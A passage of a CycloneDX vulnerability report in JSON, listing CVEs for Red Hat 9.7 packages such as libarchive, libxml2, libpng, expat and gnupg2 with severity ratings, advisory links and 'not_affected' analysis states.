"urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-60753", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 400, 835 ], "description": "An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash).", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-60753" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-60753" }, { "url": "https://github.com/Papya-j/CVE/tree/main/CVE-2025-60753" }, { "url": "https://github.com/libarchive/libarchive/issues/2725" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60753" }, { "url": "https://ubuntu.com/security/notices/USN-8147-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-60753" } ], "published": "2025-11-05T16:15:40+00:00", "updated": "2026-02-04T21:19:45+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.5.3-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-6170", "ratings": [ { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "cbl-mariner" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 2.5, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L" }, { "source": { "name": "photon" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 2.5, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 121 ], "description": "A flaw was found in the interactive shell of the xmllint command-line tool, used for parsing XML files. When a user inputs an overly long command, the program does not check the input size properly, which can cause it to crash. This issue might allow attackers to run harmful code in rare configurations without modern protections.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-6170" }, { "url": "https://access.redhat.com/errata/RHSA-2026:7519" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-6170" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372952" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/941" }, { "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00014.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6170" }, { "url": "https://ubuntu.com/security/notices/USN-7694-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-6170" } ], "published": "2025-06-16T16:15:20+00:00", "updated": "2026-04-19T20:16:22+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.9.13-14.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-64118", "ratings": [ { "source": { "name": "redhat" }, "score": 4.7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "cwes": [ 362, 367 ], "description": "node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-64118" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-64118" }, { "url": "https://github.com/isaacs/node-tar" }, { "url": "https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d" }, { "url": "https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9" }, { "url": "https://github.com/isaacs/node-tar/issues/445" }, { "url": "https://github.com/isaacs/node-tar/pull/446" }, { "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64118" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-64118" } ], "published": "2025-10-30T18:15:33+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.34-9.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-64505", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4.4, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 125 ], "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-64505" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-64505" }, { "url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37" }, { "url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37" }, { "url": "https://github.com/pnggroup/libpng/pull/748" }, { "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64505" }, { "url": "https://ubuntu.com/security/notices/USN-7924-1" }, { "url": "https://ubuntu.com/security/notices/USN-8081-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-64505" }, { "url": "https://www.openwall.com/lists/oss-security/2025/11/22/1" } ], "published": "2025-11-25T00:15:47+00:00", "updated": "2025-11-26T18:28:32+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.6.37-12.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-64506", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.1, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 125 ], "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_write_image_8bit function when processing 8-bit images through the simplified write API with convert_to_8bit enabled. The vulnerability affects 8-bit grayscale+alpha, RGB/RGBA, and images with incomplete row data. A conditional guard incorrectly allows 8-bit input to enter code expecting 16-bit input, causing reads up to 2 bytes beyond allocated buffer boundaries. This issue has been patched in version 1.6.51.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-64506" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-64506" }, { "url": "https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821" }, { "url": "https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821" }, { "url": "https://github.com/pnggroup/libpng/pull/749" }, { "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-qpr4-xm66-hww6" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64506" }, { "url": "https://ubuntu.com/security/notices/USN-7924-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-64506" }, { "url": "https://www.openwall.com/lists/oss-security/2025/11/22/1" } ], "published": "2025-11-25T00:15:47+00:00", "updated": "2025-11-26T18:34:38+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.6.37-12.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-66382", "ratings": [ { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 2.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 407 ], "description": "In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-66382" }, { "url": "http://www.openwall.com/lists/oss-security/2025/12/02/1" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-66382" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html" }, { "url": "https://github.com/libexpat/libexpat/issues/1076" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66382" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-66382" } ], "published": "2025-11-28T07:15:57+00:00", "updated": "2026-05-12T13:17:23+00:00", "affects": [ { "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.5.0-5.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2025-68972", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "nvd" }, "score": 4.7, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N" } ], "cwes": [ 347 ], "description": "In GnuPG through 2.4.8, if a signed message has \\f at the end of a plaintext line, an adversary can construct a modified message that places additional text after the signed material, such that signature verification of the modified message succeeds (although an \"invalid armor\" message is printed during verification). This is related to use of \\f as a marker to denote truncation of a long plaintext line.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2025-68972" }, { "url": "https://access.redhat.com/security/cve/CVE-2025-68972" }, { "url": "https://gpg.fail/formfeed" }, { "url": "https://media.ccc.de/v/39c3-to-sign-or-not-to-sign-practical-vulnerabilities-i" }, { "url": "https://news.ycombinator.com/item?id=46404339" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68972" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2025-68972" } ], "published": "2025-12-27T23:15:40+00:00", "updated": "2026-01-09T20:08:47+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.3.3-5.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null 